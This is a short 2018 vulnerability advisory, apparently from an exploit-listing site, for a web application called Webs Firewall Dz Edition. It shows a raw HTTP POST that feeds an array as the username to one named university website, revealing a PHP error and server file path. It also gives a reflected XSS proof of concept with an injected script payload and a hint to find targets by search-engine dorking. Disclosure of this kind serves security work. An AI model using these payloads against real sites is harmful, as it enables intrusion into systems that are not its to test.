Webs Firewall Dz Edition v1.18 Multi vulnerability

2018.03.08
dz indoushka (DZ) dz
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

==================================================================================================================================== | # Title : Webs Firewall Dz Edition v1.18 Multi vulnerability | | # Telegram : @indoushka | | # Tested on : windows 10 Français V.(Pro) | | # Version : 1.18 | | # Vendor : http://www.ithrytec.com/ | ==================================================================================================================================== poc : [+] Dorking İn Google Or Other Search Enggine Application error message : Request POST /webs/index HTTP/1.1 Content-Length: 53 Content-Type: application/x-www-form-urlencoded Referer: http://imaa-univ.com/webs/ Cookie: PHPSESSID=42b374f6e8a331cad18647dd127167b0 Host: imaa-univ.com Connection: Keep-alive Accept-Encoding: gzip,deflate User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21 Accept: */* signin=&password=g00dPa%24%24w0rD&username[]=nxseqxeaResponse HTTP/1.1 200 OK Server: nginx/1.12.2 Date: Tue, 06 Mar 2018 17:49:59 GMT Content-Type: text/html Connection: keep-alive Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Original-Content-Encoding: gzip Content-Length: 2661 Vulnerability description : This page contains an error/warning message that may disclose sensitive information. The message can also contain the location of the file that produced the unhandled exception. This may be a false positive if the error message is found in documentation pages. This vulnerability affects /webs/index. Attack details : URL encoded POST input username was set to nxseqxea Error message found : <b>Warning</b>: mysqli_real_escape_string() expects parameter 2 to be string, array given in <b>/home/imaauniv/public_html/webs/index.php</b> on line <b>106</b><br /> XSS Reflected - jQuery JavaScript Library v2.2.4 : <html> <head> <meta charset="utf-8"> <title>XSS Reflected - jQuery JavaScript Library v2.2.4 </title> <script src="http://imaa-univ.com/webs/assets/js/jquery-2.2.4.min.js"></script> <script> $(function() { $('#users').each(function() { var select = $(this); var option = select.children('option').first(); select.after(option.text()); select.hide(); }); }); </script> </head> <body> <form method="post"> <p> <select id="users" name="users"> <option value="xssreflected"><script><marquee><font color=lime size=32>indoushka</font></marquee>;</script>;</script></option> </select> </p> </form> </body> </html> Greetings to :========================================================================================================================= | jericho * Larry W. Cashdollar * brutelogic* shadow_00715* 9aylas * djroot.dz * LiquidWorm* Hussin-X *D4NB4R * ViRuS_Ra3cH * yasMouh | | | =======================================================================================================================================


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2018, cxsecurity.com

 

Back to Top